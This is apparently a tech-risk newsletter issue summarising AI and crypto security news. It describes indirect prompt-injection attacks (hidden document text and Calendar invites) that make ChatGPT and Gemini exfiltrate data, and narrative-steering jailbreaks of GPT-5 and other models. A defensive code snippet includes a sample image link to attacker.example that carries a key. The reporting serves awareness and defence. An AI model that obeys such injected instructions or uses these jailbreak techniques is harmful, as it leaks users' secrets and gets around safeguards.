TechRisk #134: Indirect prompt attacks
Plus: when gibberish isn’t garbage, a study on genuine quantum advantages, an AI defense system wins $4M at DEF CON, and more!
Tech Risk Reading Picks
Indirect prompt injection vulnerability: AgentFlayer, a newly disclosed zero-click vulnerability in ChatGPT’s Connectors feature presented at Black Hat, allows attackers to steal sensitive data from linked apps like Google Drive and SharePoint without user awareness. The exploit uses indirect prompt injection, hiding malicious instructions in seemingly benign documents (e.g., in invisible 1-pixel text). When ChatGPT processes such a document, it is tricked into ignoring the user’s request and instead retrieving and exfiltrating confidential data, including API keys, via covert image links to attacker-controlled servers. This flaw bypasses existing safeguards and illustrates a broader class of risks in AI systems connected to third-party services, similar to the earlier EchoLeak vulnerability. Security experts warn that such threats are inherent to current AI agent architectures and will likely become more common unless stronger guardrails and dependency controls are implemented. [more]
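As a rough illustration of one possible mitigation (not part of the original disclosure), the Python sketch below scans assistant output for markdown image links whose hosts fall outside an allowlist before rendering, since covert image URLs are the exfiltration channel described above. The allowlist, function names, and example URL are hypothetical.

```python
# Minimal sketch, assuming a markdown-rendering chat UI: strip image links
# that point at non-allowlisted hosts before display, since covert image
# URLs are a common channel for exfiltrating data via injected prompts.
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"docs.example.com", "cdn.example.com"}  # hypothetical allowlist

IMG_MD = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def sanitize_model_output(markdown: str) -> str:
    """Replace image links to untrusted hosts with a visible placeholder."""
    def _check(match: re.Match) -> str:
        host = urlparse(match.group("url")).netloc.lower()
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return "[image removed: untrusted host]"
    return IMG_MD.sub(_check, markdown)

if __name__ == "__main__":
    risky = "Summary done. ![x](https://attacker.example/collect?key=sk-live-123)"
    print(sanitize_model_output(risky))  # image link is stripped before rendering
```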
Misleading and jailbreaking GPT-5: Cybersecurity researchers have uncovered a new jailbreak method targeting OpenAI’s GPT-5, combining the Echo Chamber technique with narrative-driven steering to bypass ethical safeguards and elicit prohibited instructions. By seeding conversations with subtly “poisoned” context and embedding harmful intent in innocuous storytelling prompts, attackers can guide the model toward illicit outputs without triggering refusal mechanisms. The approach highlights weaknesses in keyword-based filtering and intent detection, especially in extended dialogues. These techniques (involving indirect prompting) could be used to exploit AI integrations with platforms like Google Drive, Jira, and Microsoft Copilot Studio to exfiltrate sensitive data. [more]
Prompt hacking through Google Calendar invites: Google patched a critical flaw in Gemini, its AI assistant integrated across Google services, that allowed attackers to hijack the assistant via malicious Google Calendar invites. By embedding prompt injections (often hidden in event titles), attackers could trick Gemini into executing harmful actions when users performed normal queries like checking their calendar. The exploit, demonstrated by SafeBreach researchers, required no special model access and bypassed prompt filtering. Such an exploit could enable data theft, location tracking, smart home control, and more. Google credited the responsible disclosure for enabling a fix before exploitation and said new safeguards are already deployed to counter similar threats. [more]
Agentic OS-based AI tools still lack security and privacy protections: A new academic survey warns that “OS Agents” (AI systems capable of autonomously controlling computers, phones, and browsers) are advancing rapidly, with over 60 models and 50 frameworks emerging since 2023, and tech giants like OpenAI, Google, Apple, and Anthropic racing to deploy them. These agents can understand interfaces, plan multi-step tasks, and execute actions across apps, promising major productivity gains but introducing unprecedented security risks, including prompt injection and data exfiltration attacks that could bypass human safeguards. While current systems excel at simple, repetitive digital work, they still struggle with complex, context-heavy tasks. Future development will hinge on personalization, which could revolutionize work but also deepen privacy concerns. The study stresses that security and privacy protections for these agents are underdeveloped. [more]
AI defense system wins $4M at DEF CON: At DEF CON, DARPA awarded $4 million to Team Atlanta (a collaboration between Georgia Tech, Samsung Research, KAIST, and POSTECH) for winning its two-year AI Cyber Challenge (AIxCC). Teams were tasked with building AI systems that could autonomously find and fix software vulnerabilities. Competing against dozens of rivals, Team Atlanta stood out by combining traditional threat-hunting tools with AI to deliver the highest-quality and most accurate patches across 54 million lines of code. The challenge, run with support from companies like Anthropic, Google, OpenAI, Microsoft, and the Linux Foundation, resulted in 77% of synthetic vulnerabilities being patched, up from 37% last year. [more]
Increased malicious usage of LLMs: Russia’s APT28 has deployed LAMEHUG, the first confirmed large language model (LLM)-powered malware, against Ukraine, using stolen Hugging Face API tokens to run real-time attacks disguised by official-looking documents or distracting images, while underground platforms now sell similar AI malware capabilities for $250/month. Security researcher Vitaly Simonovich demonstrated that consumer AI tools like ChatGPT-4o, Copilot, and DeepSeek can be manipulated into producing functional malware in under six hours via “narrative engineering” that bypasses safety controls, revealing a serious vulnerability as AI adoption in enterprises surges. With platforms like Xanthrox AI and Nytheon AI offering uncensored and fully operational malware development environments, the expertise barrier for sophisticated attacks has collapsed. Nation-state-level capabilities are now accessible to anyone with creativity and modest resources. [more]
When gibberish isn’t garbage: A recent study by Assistant Professor Michael Shieh at NUS Computing reveals that AI language models can not only read but also learn from “unnatural language”—text that appears as gibberish to humans, with jumbled syntax, misspellings, and random symbols. Using systematic generation techniques, the team showed that large language models (LLMs) can extract key concepts from these strings, reconstruct their meaning with contextual cues, and even follow instructions when fine-tuned on such data, performing on par with models trained on normal language. This challenges traditional notions of language, showing that LLMs rely on deeper statistical and relational patterns rather than human-readable grammar, with implications for AI robustness, low-resource training, adversarial testing, and interpretability. The findings highlight that AI “language understanding” is fundamentally different from human understanding—structured, abstract, and hidden within what we perceive as noise. [more]
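As a loose illustration only (the study’s own systematic generation techniques are more principled), the sketch below perturbs an ordinary instruction into “unnatural language” of the kind such robustness probes use: jumbled word order, misspellings, and stray symbols. All names and parameters here are made up for the example.

```python
# Minimal sketch, not the study's actual method: turn a normal instruction
# into gibberish-looking text to probe whether a model still recovers intent.
import random

def perturb(sentence: str, seed: int = 0) -> str:
    rng = random.Random(seed)
    words = sentence.split()
    rng.shuffle(words)                                  # jumble word order
    noisy = []
    for w in words:
        if len(w) > 3 and rng.random() < 0.5:
            i = rng.randrange(1, len(w) - 1)
            w = w[:i] + w[i + 1] + w[i] + w[i + 2:]     # swap two inner letters (misspelling)
        if rng.random() < 0.3:
            w += rng.choice("#@$%~")                    # sprinkle a stray symbol
        noisy.append(w)
    return " ".join(noisy)

if __name__ == "__main__":
    print(perturb("summarize the quarterly sales report for the board"))
```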
Quantum advantages: A new study by researchers from Caltech, MIT, Google Quantum AI, and AWS proposes a rigorous framework for distinguishing genuine quantum advantages from “pseudo-advantages” that vanish when classical methods catch up. They define five hallmarks of a true advantage: predictability, typicality, robustness, verifiability, and usefulness. In addition, they classify potential advantages into four realms: computation, learning and sensing, cryptography and communication, and space advantages. The authors caution that advances in classical algorithms, noise in quantum systems, and the inherent unpredictability of some advantages (which may require quantum computers themselves to verify) make proving superiority challenging. They argue that both theoretical rigor and practical benchmarking are essential to avoid misallocating resources in this rapidly growing field, noting that the most transformative quantum applications may be unforeseeable until large-scale quantum technologies are in everyday use. [more][more-research_paper]
CrowdStrike Report 2025: CrowdStrike’s 2025 Threat Hunting Report reveals a major shift in the cyber threat landscape, with adversaries not only using AI to supercharge attacks but also increasingly targeting AI platforms themselves, alongside a record surge in cloud intrusions up 136% from 2024. China-linked groups like GENESIS PANDA and MURKY PANDA are exploiting cloud misconfigurations, trusted relationships, and admin tooling to persist and exfiltrate data, while CVE-2025-3248 in Langflow AI shows how AI infrastructure is becoming a prime attack vector. North Korea’s FAMOUS CHOLLIMA demonstrates AI weaponization through deepfakes, identity fraud, and AI-assisted job infiltration, reflecting a 220% spike in such tactics. Identity compromise remains central to cross-domain intrusions, with groups like SCATTERED SPIDER bypassing MFA via vishing to pivot rapidly across SaaS, cloud, and endpoint environments. With 81% of interactive intrusions being malware-free and nation-state targeting rising sharply, the report urges AI-driven defense, cloud-native security, strict access controls, and continuous auditing to counter the converging threats in AI and cloud. [more][more-Crowdstrike]
Web3 Cryptospace Spotlight
$3M phishing attack: A cryptocurrency investor lost over $3 million in Tether (USDT) after unknowingly approving a fraudulent transaction in a phishing scam that mimicked a legitimate wallet address. The scam exploits the tendency of users to check only the first and last characters of an address. Such phishing attacks, rather than technical exploits, are now the leading cause of crypto losses, accounting for over $410 million in losses in the first half of 2025. Experts stress verifying full wallet addresses, understanding transaction details, regularly revoking old approvals, and practicing safe habits like avoiding suspicious links. Enabling multi-factor authentication and using secure wallet management also help reduce risk. [more]
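A minimal sketch of the “verify the full address” advice, using made-up addresses for illustration: a prefix/suffix check of the kind users do by eye accepts a poisoned look-alike address, while an exact comparison against the saved address rejects it.

```python
# Minimal sketch, assuming hypothetical addresses: compare the whole address,
# not just the characters a human tends to eyeball.
def looks_same_to_a_human(addr_a: str, addr_b: str, chars: int = 4) -> bool:
    """Mimics checking only the first and last few characters."""
    return addr_a[:chars] == addr_b[:chars] and addr_a[-chars:] == addr_b[-chars:]

def is_exact_match(addr_a: str, addr_b: str) -> bool:
    """Compare the entire address, case-normalized."""
    return addr_a.strip().lower() == addr_b.strip().lower()

saved_address    = "0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B"  # made-up
poisoned_address = "0xAb58f1c2e3D4a5B6c7d8E9f0A1b2C3d4e5f6eC9B"  # same ends, different middle

print(looks_same_to_a_human(saved_address, poisoned_address))  # True  -> fooled
print(is_exact_match(saved_address, poisoned_address))         # False -> caught
```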
Crypto exchange breached: Turkish crypto exchange BTCTurk has temporarily halted deposits and withdrawals after detecting a security breach in its hot wallets, with blockchain analysts tracking $49M worth of digital assets leaving the platform. The company, which holds most assets in cold storage, assured users their funds remain safe. It also indicated that Turkish Lira transactions continue unaffected while law enforcement investigates. [more]
Crypto Crime Taskforce: Tron, Tether, and TRM Labs’ T3 Financial Crime Unit (T3 FCU), launched in September 2024, has frozen over $250 million in illicit crypto assets by collaborating with global law enforcement on cases including money laundering, fraud, and terrorism financing. The frozen assets are more than double the amount reported in its first six months. To expand its reach, the new T3+ program brings exchanges like Binance into a real-time intelligence-sharing network to combat crypto crime amid increasingly rapid and sophisticated hacks. While T3 FCU’s recovery efforts highlight the value of centralized intervention, including Tether’s ability to freeze stolen funds, critics caution that such powers challenge crypto’s decentralized principles, sparking debate over balancing security with user sovereignty. [more]